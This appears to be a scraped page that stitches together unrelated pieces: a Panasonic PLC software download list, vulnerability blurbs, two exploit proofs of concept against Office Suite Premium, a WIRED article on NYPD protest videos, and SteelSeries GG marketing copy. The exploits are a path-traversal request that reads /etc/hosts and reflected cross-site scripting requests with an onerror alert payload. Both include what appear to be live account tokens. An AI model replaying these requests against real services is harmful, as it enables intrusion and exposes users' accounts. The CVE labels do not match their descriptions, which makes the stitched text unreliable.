4.5 MB

Italian

ZIP Laser Marker Library

Software, Library

4.5 MB

01.03.2010

PDF Les essentiels - Produits d’automatisme, 6215eufr

Catalog, Shortform

5.5 MB

16.06.2023

French

ZIP Motion & Communication FPWIN Pro 7 Library for MINAS A5B/A6B Series, EtherCAT,Version 1.1.0, Included Demo Program. Supported PLCs: FP7

Software, Library

3.4 MB

30.06.2020

English

ZIP Motion & Communication FPWIN Pro 7 Library for MINAS A5N/A6N Series, RTEX, Version 1.0.0.0, Included Demo Program. Supported PLC: FP-XH

Software, Library

1.7 MB

19.04.2018

English

ZIP Motion & Communication FPWIN Pro 7 Library for MINAS A6 Series, Modbus RTU, Version 2.1.0.2, Included Demo Program. Supported PLCs: FP0R, FP-Sigma, FP-X, FP7, FP0H

Software, Library

4.7 MB

12.02.2020

English

ZIP Motion & Communication FPWIN Pro 7 Library for MINAS BL Series, RS485 Serial Protocol, Version 2.2.0.0, Included Demo Program. Supported PLCs: FP-0R, FP-Sigma, FP-X, FP-0H, FP-XH, FP7(for COM ports o…

Software, Library

13.7 MB

08.04.2019

English

ZIP Motion & Communication FPWIN Pro 7 Library for MINAS LIQI/A5/A6 Series, Pulse Train Output, Version 1.0.1.0, Included Demo Program. Supported PLCs: FP0H, FP-XH

Software, Library

1.6 MB

21.07.2021

English

ZIP Motion & Communication Library for MINAS A5 / A6 Series, Pulse Output Control with Multi I/O Unit, Version 1.0.0.0, Included Demo Program. Supported PLCs: FP7

Software, Library

3.9 MB

12.12.2017

English

ZIP Motion & Communication Library for MINAS A5 / A6 Series, Pulse Output Control with Positioning Unit, Version 1.5.0.0, Included Demo Program. Supported PLCs: FP7

Software, Library

2.9 MB

12.12.2017

English

ZIP Motion & Communication Library for MINAS A5N/A6N Series, RTEX, Version 1.2.4, Included Demo Program. Supported PLCs: FP-0H

Software, Library

24.7 MB

24.01.2023

English, German

ZIP Motion & Communication Library for MINAS A5N/A6N Series, RTEX, Version 2.2.0.0, Included Demo Program. Supported PLCs: FP-Sigma

Software, Library

799.8 KB

12.02.2018

English

ZIP Motion Control Library for MINAS LIQI / A5 / A6 Series, Pulse Output Control with compact PLCs, Version 1.0, Included Demo Program. Supported PLCs: FP0R, FP-Sigma, FPX, FP7

Software, Library

1.3 MB

12.12.2017

English

PDF Overview Programmable Logic Controllers

Catalog, Shortform

6 MB

18.10.2021

English

PEW-CONTROL-DRIVER-A4-VIA-RS485 Library

Software, Library

55.4 KB

01.07.2009

ZIP PEW\_A5\_A6\_RS232 Library

Software, Library

3.6 MB

28.04.2015

English

ZIP Software tool used for switching FP0R PLC types from FP0R mode into FP0 mode. After that FP0R PLC can be programmed with software tools supporting FP0.

Software

35.2 MB

17.07.2013

English

ZIP Solar Tracking Library

Software, Library

2.2 MB

01.02.2011

PDF Soluzioni Compact Motion - Dedicate ai costruttori di macchine, MC09/2018-2000

Catalog

7.6 MB

03.09.2018

Italian

PDF Telecontrol: catalogo resumido

Catalog, Shortform

1.1 MB

Spanish

PDF Top seller - Automation products, 6215euen

Catalog, Shortform

15.7 MB

04.05.2023

English

ZIP User library 3964R 3.02 - function blocks for 3964R/RK512 procedure (incl. Engl. a. German online) ( TB-3964R )

Software, Library

4.8 MB

12.12.2016

English, German

ZIP User library ACRON - function blocks ACRON / ACRON connect ( incl. German online)

Software, Library

4.7 MB

ZIP User library GPRS 3.2.2.0 - function blocks for GPRS communication (for FPWIN Pro 7 or newer, incl. English and German online help)

Software, Library

11.8 MB

30.06.2022

English, German

ZIP User library IEC60870 2.611- function blocks for remote control with the IEC 60870-5 standard protocol (for FPWIN Pro 5 and 6, incl. English and German online help)

Software, Library

17.1 MB

09.05.2016

English, German

ZIP User library IEC60870 3.11- function blocks for remote control with the IEC 60870-5 standard protocol (for FPWIN Pro 7 and newer, incl. English and German online help)

Software, Library

17.7 MB

09.05.2016

English, German

User library MBUS - M-Bus master software functions (incl. German online) ( TB-MBUS )

Software, Library

4.2 MB

07.01.2015

English

ZIP User library MoP, V. 1.31 – Function blocks for time slot technique and multipoint connection (for FPWIN Pro 5 and 6, incl. German online help) (TB-MOP)

Software, Library

4.1 MB

01.10.2010

English

ZIP User library MoP, V.2.00 – Function blocks for time slot technique and multipoint connection (for FPWIN Pro 7 and newer, incl. German online help) (TB-MOP)

Software, Library

4.5 MB

15.06.2015

English

User library Modbus RTU - function blocks for Modbus communication with FP-G(FPG951)MCU, (incl. English online help)

Software, Library

177.1 KB

28.04.2015

English

User library Modbus RTU - function blocks for Modbus communication with FP2, FP2 MCU, FP0 and FP-G(FPG951)MCU, not necessary for FP0R, FP-X, FP-G and FP7, (incl. English, German a. Italian online hel…

Software, Library

6.1 MB

07.04.2015

English, German, Italian

ZIP User library PTC - function blocks for process and temperature control (incl. German a. English online help)

Software, Library

5.8 MB

01.02.2013

English

User library SEAB-1F - Software functions to communicate to AEG-telecontrol (master, slave (incl. German online)

Software, Library

4.9 MB

23.09.2014

English, German

ZIP User library for reading ECO POWER METERS (KW1M, KW2M and KW9M)

Software, Library

1.2 MB

10.04.2018

English

ZIP User library timelib 4.1 - function blocks for UNIX/IEC-compliant time for FPWIN Pro 6 and FPWIN Pro 7 (incl. German online help)

Software, Library

2.8 MB

12.12.2016

PDF Übersicht Speicherprogrammierbare Steuerungen

Catalog, Shortform

13.3 MB

02.12.2021

German

PDF Übersicht Topseller Automatisierungstechnik, 6215eude

Catalog, Shortform

15.6 MB

24.04.2023

German

ZIP Control FPWIN Pro7, full and update version 7.7.0.0 FULL: For a full version buy a license separately. Article no. is " FPWINPRO7\_LICENSE ". Please order it at your local Panasonic sales contact. Thi…

Software

462.7 MB

22.06.2023

English, german, italian, french, spanish, japanese, chinese, korean

ZIP FPWIN Pro GSM alarm notification library (NCL-CCMS-LIB) version 1.200, Windows Configuration software (SetupControlConfiguratorMSLib1.102) and manuals. The FPWIN Pro libraries in "NCL-CCMS-LIB" cont…

Software, Library

30.9 MB

02.09.2015

English, German

ZIP FPGT Loader, Vers.2.2.2.0, is a utility for up-/downloading data to and from GT panels(GT01, GT02, GT03-E, GT11, GT21, GT05, GT12, GT32) and PLCs(FP0, FP0R, FP0H, FP7, FP2, FP2SH, FP-Sigma, FP-X, FP-…

Software

79.3 MB

10.08.2021

English, German, Spanish

CVE-2023-28730: Programming Software Control FPWIN Pro

A Cross-Site Request Forgery (CSRF) in the Admin portal of Cockpit CMS v2.5.2 allows attackers to execute arbitrary Administrator commands.

CVE-2023-37650: Multiple Vulnerabilities in Cockpit CMS <= v2.5.2

Office Suite Premium v10.9.1.42602 was discovered to contain a local file inclusion (LFI) vulnerability via the component /etc/hosts.

    # Exploit Title: Office Suite Premium 10.9.1.42602 -  Local File Inclusion # Date: 06-26-2023# Exploit Author: tmrswrr# Vendor Homepage: https://www.mobisystems.com/# Software Link: https://apps.apple.com/us/app/officesuite-docs-pdf-editor/id924005506# Version: Office Suite Premium 10.9.1.42602# Tested on: Ubuntu 18.04# POCGET /../../../../../../../../../../../../../../../etc/hosts HTTP/2Host: connect.mobisystems.comAccept: */*Clv: 42602Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.freeAccept-Language: tr-TR,tr;q=0.9Accept-Encoding: gzip, deflateApp: com.mobisystems.ios.office.freeUser-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0Gdpr: trueAccount: 234c89ff-7e80-4b64-9d35-8653fe131795Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19Result : 127.0.0.1 localhost 169.254.169.254 metadata.google.internal metadata 169.254.169.253 appengine.googleapis.internal appengine Url: https://connect.mobisystems.com/etc/hosts

CVE-2023-37601: Office Suite Premium 10.9.1.42602 Local File Inclusion ≈ Packet Storm

Office Suite Premium Version v10.9.1.42602 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the filter parameter at /api?path=files.

    # Exploit Title: Office Suite Premium 10.9.1.42602 - Cross-Site Scripting (reflected)# Date: 06-26-2023# Exploit Author: tmrswrr# Vendor Homepage: https://www.mobisystems.com/# Software Link: https://apps.apple.com/us/app/officesuite-docs-pdf-editor/id924005506# Version: Office Suite Premium 10.9.1.42602# Tested on: Ubuntu 18.04# POC# Exploit Details : Following request will create a tool with an XSS payload. Click on the URL link for the malicious tool to trigger the payload.Request 1: GET /api?path=profile&lang=en_EN&application=wynq8%3cimg%20src%3da%20onerror%3dalert(1)%3egik2hgdc3o2&command=issue-xchange-code HTTP/2Host: connect.mobisystems.comAccept: */*Clv: 42602Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.freeAccept-Language: en_EN,en;q=0.9Accept-Encoding: gzip, deflateApp: com.mobisystems.ios.office.freeUser-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0Gdpr: trueAccount: 234c89ff-7e80-4b64-9d35-8653fe131795Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19Url: https://connect.mobisystems.com/api?path=profile&lang=en_EN&application=wynq8%3cimg%20src%3da%20onerror%3dalert(1)%3egik2hgdc3o2&command=issue-xchange-codePayload: <img src=a onerror=alert(1)>Parameter : applicationRequest 2 : GET /api?path=files&id=dfsse%3cimg%20src%3da%20onerror%3dalert(1)%3ez1668cyj2pi&revision=%22%22&type=%22thumb%22&command=url&expires=1687785968527 HTTP/2Host: connect.mobisystems.comAccept: */*Clv: 42602Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.freeAccept-Language: en_EN,en;q=0.9Accept-Encoding: gzip, deflateApp: com.mobisystems.ios.office.freeUser-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0Lang: en_ENGdpr: trueAccount: 234c89ff-7e80-4b64-9d35-8653fe131795Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19URL : https://connect.mobisystems.com/api?path=files&id=dfsse%3cimg%20src%3da%20onerror%3dalert(1)%3ez1668cyj2pi&revision=%22%22&type=%22thumb%22&command=url&expires=1687785968527Payload : <img src=a onerror=alert(1)>Parameter: idRequest 3 : GET /api?path=files&filter=pt3gh%3cimg%20src%3da%20onerror%3dalert(1)%3ei22b7eyyoi2&options=%7B%22order%22%3Anull%2C%22size%22%3A100%2C%22cursor%22%3Anull%7D&root=%7B%22account%22%3A%22234c89ff-7e80-4b64-9d35-8653fe131795%22%2C%22key%22%3Anull%2C%22name%22%3Anull%2C%22parent%22%3Anull%7D&command=search HTTP/2Host: connect.mobisystems.comAccept: */*Clv: 42602Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.freeAccept-Language: en_EN,en;q=0.9Accept-Encoding: gzip, deflateApp: com.mobisystems.ios.office.freeUser-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0Lang: en_ENGdpr: trueAccount: 234c89ff-7e80-4b64-9d35-8653fe131795Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19URL : https://connect.mobisystems.com/api?path=files&filter=pt3gh%3cimg%20src%3da%20onerror%3dalert(1)%3ei22b7eyyoi2&options=%7B%22order%22%3Anull%2C%22size%22%3A100%2C%22cursor%22%3Anull%7D&root=%7B%22account%22%3A%22234c89ff-7e80-4b64-9d35-8653fe131795%22%2C%22key%22%3Anull%2C%22name%22%3Anull%2C%22parent%22%3Anull%7D&command=searchPayload :<img src=a onerror=alert(1)>Parameter: filter

CVE-2023-38617: Office Suite Premium 10.9.1.42602 Cross Site Scripting ≈ Packet Storm

A landmark $13 million settlement with the City of New York is the latest in a string of legal wins for protesters who were helped by a video-analysis tool that smashes the “bad apple” myth.

Beaten, blinded by pepper spray, corralled like animals, and indiscriminately arrested for marching against police violence and racial injustice. Such was the fate hundreds of people suffered at the hands of New York Police Department (NYPD) officers in late May and early June of 2020, as thousands of people across the United States protested the murder of George Floyd by a Minneapolis police officer.

Three years later, a class action lawsuit has resulted in the City of New York agreeing to pay $9,950 each to some 1,380 protesters as part of a settlement. Costing taxpayers more than $13 million, it’s the largest amount paid to protesters in US history, according to the legal team behind the class action suit.

Lawyers secured the settlement with the aid of a little-known tool that helped them quickly categorize and analyze terabytes of video footage from police body cams, helicopter surveillance, and social media. “We had multiple weeks of protests. We had protests spanning the city of New York. We had thousands of arrests,” says David Rankin, a partner at the law firm Beldock, Levine & Hoffman who was part of the protesters’ legal team. “We had tens of thousands of hours of body cam footage, we had text messages, we had emails, we had just an absolute truckload of data to get through.”

The path through all this data was carved by Codec, a video categorization tool developed by the civil liberties-focused design agency SITU Research. Launched in June 2022, the tool is proving essential in legal battles around the world, where hours of disparate video footage can reveal orchestrated, state-backed violence against protesters.

Clip by Clip

Dozens of videos shared with WIRED show how the legal team built their case. Using this data, which also included geospatial information, time stamps, and the category of the alleged misconduct, we were able to build a map that allows anyone to watch the police incidents that were central to the lawsuit. Each dot represents an incident the legal team characterized as police misconduct. Of the 72 videos the legal team flagged as most pertinent to their case, the map includes 47 videos recorded by police body cams or surveillance cameras. The locations of the remaining 25 videos, which appear to have been taken from social media and other sources, are also pinpointed on the map. In total, the legal team analyzed more than 6,300 videos. 

Some of the videos on the map contain graphic violence, and viewer discretion is advised. Videos will autoplay with the sound on.

Video evidence was obtained from various sources, including police body cameras and helicopters. SITU Research geolocated the data and provided it to WIRED.

Among the videos we reviewed, an NYPD officer can be seen running down the sidewalk while pepper-spraying a person who’s standing against a building, entirely out of the officer’s way. In another video, an officer hits a protester with a car door while driving down the street. Another video shows a group of officers interlocking arms as one of them says, “Just like we fucking practiced.” The officers then charge a group of protesters before singling out a person on the sidewalk and beating them with batons. Taken together, the footage demonstrates widespread, systematic police misconduct during protests that spanned from May 28 to June 4, 2020, across multiple neighborhoods in New York City, according to the lawsuit.

While looting and vandalism took place in several neighborhoods during the protests, the demonstrations were largely peaceful. The defendants in the lawsuit have not admitted wrongdoing as part of the settlement, and city attorneys deny an orchestrated effort to violate protesters’ rights. Reached for comment, the NYPD referred WIRED to the city’s Law Department, which has not yet responded to a request for comment.

Remy Green, a partner at Cohen & Green and a member of the protesters’ legal team, says the use of police body cameras, which have been touted as a step in the right direction for civil liberties, has become “a kind of band-aid solution to police brutality.” A single video can only reveal so much, Green says, and police departments can use this limitation to obfuscate what really happened. Protests that are met with an extreme police response require a zoomed-out vantage point, which is what Codec allowed the legal team to create. “It gives you a much more comprehensive look at the activities that occurred,” says Green.

Hard Pivot

The idea of using Codec in the lawsuit came from a related case settled earlier this year. Here, Human Rights Watch worked with SITU Research to analyze video footage of protests in the Mott Haven neighborhood of the Bronx, one of New York City’s five boroughs. Their work proved that the NYPD used an anti-protest tactic called “kettling”—trapping a group of people so they can’t escape—just prior to a government-mandated curfew, thus ensuring that they were in violation of the order. In March, a lawsuit against the city over the NYPD’s use of kettling ended in a $21,500 payout to each of more than 300 Mott Haven protesters, which is estimated to be the highest per-person settlement for a mass arrest in US history. The NYPD said in a statement following the settlement that it has since “re-envisioned” its “policies and training for policing large-scale demonstrations.”

Having seen the forensic video investigation SITU’s work on the Mott Haven protests produced, Rankin asked for help conducting a similar investigation. But this time it wouldn’t focus on police conduct during a single protest in one neighborhood, but rather protests across New York City.

Now an open source tool that’s free to use, Codec was first built for internal use only, according to Brad Samuels, a founding partner of SITU who oversees its research division. Codec categorizes video files using a range of criteria, including the location where a video was taken and the time and date it was recorded. Analysts can add their own parameters, such as whether a video shows police use of pepper spray, which enables them to more easily pinpoint clips that are relevant to an investigation.

Early on, the SITU team focused on international incidents, such as the 2014 Maidan Revolution in Ukraine and a 2019 uprising in Iraq in which security forces fired military-grade tear gas canisters directly at protesters’ heads. After the murder of George Floyd in May 2020, the US-based SITU team “pivoted hard” to investigate domestic incidents. The agency’s focus on the 2020 Black Lives Matter protests that followed resulted in investigations into police misconduct in Portland, Oregon, and Charlotte, North Carolina. Investigations in Mott Haven and across New York City are the latest to join that list.

The legal team behind the New York City-wide lawsuit, which operated through the National Lawyers Guild, a civil rights-focused nonprofit, obtained thousands of videos from the NYPD, the city, and social media feeds, most of which were unpublished until this week. Using Codec, analysts pinpointed four broad categories of what the legal team characterized as police misconduct: improper arrests, improper use of pepper spray, improper baton strikes, and excessive force.

While Codec greatly enhanced the legal team’s ability to analyze thousands of videos, it still took “a lot of human hours” to make the data usable and identify specific moments that were useful for their case, Rankin says. This included identifying the location of specific police interactions, categorizing the alleged misconduct, and adding accurate time stamps—all of which require ample hours of human work to complete, even with Codec’s help.

In future cases that require high-volume video analysis, however, that job may become easier. Samuels says the SITU team is currently working to add layers of machine learning and computer vision to Codec. He hopes that by next year the system can be tasked with, for example, detecting batons in footage—something that is currently done manually.

Widespread protests like those that took place in 2020 don’t often happen in the US. And Rankin points out that cases like the one settled this week are rare. But Green says they’re not nearly rare enough. “Our role as civil rights attorneys, I like to think, is to attempt to put ourselves out of a job,” Green says. “This settlement marks a high-water mark in terms of financial accountability, but I don’t see myself losing my job anytime soon.”

_Map creation and additional data work by Danielle Carrick_

NYPD Body Cam Data Shows the Scale of Violence Against Protesters

An issue was discovered in SteelSeries GG 36.0.0. An attacker can change values in an unencrypted database that is writable for all users on the computer, in order to trigger code execution with higher privileges.

**GET MORE OUT OF YOUR GAME**

SteelSeries GG helps create better connections with your gear, your people and your game.

Free Download

Check your email

Send the download link to your email

Windows 10+

Free Download

Check your email

Send the download link to your email

macOS 10.13+

**3D AIMTRAINER**

Improve your aim faster and rank up in your favorite FPS game. Play hundreds of fun exercises at your fingertips for free.

**Sync Your Game**

Match your sensitivity and FOV settings from your game for the best training experience.

**Test Your Aim**

Get insights to discover the weak points holding you back from being a better player.

**Train To Improve**

Get better faster with focused aim practice and fun exercises for every shooting skill.

Free Download

Check your email

Send the download link to your email

**SONAR**

Pinpoint your enemy's location long before you see them with Sonar, a breakthrough in gaming sound. Hear what others miss.

**Parametric EQ**

Amplify or reduce specific in-game sounds to hear key soundsclearer than ever.

**Audio Mixer**

As a first in gaming, you can now set separate equalizer settings for your game and chat.

**Microphone EQ**

Make yourself sound way better and remove noise for crystal clear comms to your team.

Free Download

Check your email

Send the download link to your email

**MOMENTS**

Windows Only

Moments is the easiest way to capture your favorite gaming moments and share them anywhere you want.

**Capture**

Use a custom hotkey to seamlessly capture moments after they happen.

**Clip**

Edit or trim moments in-platform from an intuitive gallery.

**Share**

Generate share links to anywhere or directly upload to select platforms.

Free Download

Check your email

Send the download link to your email

**ENGINE**

Engine is a low impact application for all your gaming rig settings like illumination, macros, binds and more.

**My gear**

Connect a SteelSeries Engine enabled device to start your customization.

**Illumination**

Set dynamic lighting effects between compatible SteelSeries devices.

**Engine Apps**

Trigger config settings in game-specific apps or enable other utility apps.

Free Download

Check your email

Send the download link to your email

**FAQ**

Yes. When Engine updates to GG, all of your device configs and settings are carried to GG, just as they were when updating to a new version of Engine. Any settings will also be persisted on future versions of GG.

After opting-in to be our software beta tester you'll automatically be updated to early versions of new features and updates. We might also send you the odd survey to hear about your experience, so we can work with you to create the best possible experience.

If you have any issues or prefer the old version you always can go back after you've been updated.

Simply disable the early release opt-in in GG, under “Settings” -> “General”.

We appreciate any feedback or comments as it helps us immensely in making a great product for everyone to enjoy.

CloudSync has been removed from Engine for now since it did not live up to your needs.

We're reconsidering how to develop a better version and hope to bring it back in the near future with even more features!

If you don’t want to use an app such as Moments, you can turn it off in the settings. When turned off it will not effect your performance and will not run in the background.

The same goes for SteelSeries Engine. If you don’t have a SteelSeries device plugged in, the Engine application inside GG will not be running in the background.

To turn Moments off you can do either of the following:  
1\. Click the dropdown menu above the Moments gallery and turn off “Gameplay capture”  
2\. Go to Settings -> Capture and Sound -> Turn off “Allow Moments to capture while gaming”

**DEVELOPER**

**CHANGELOG**

**SUPPORT**

Tag

#mac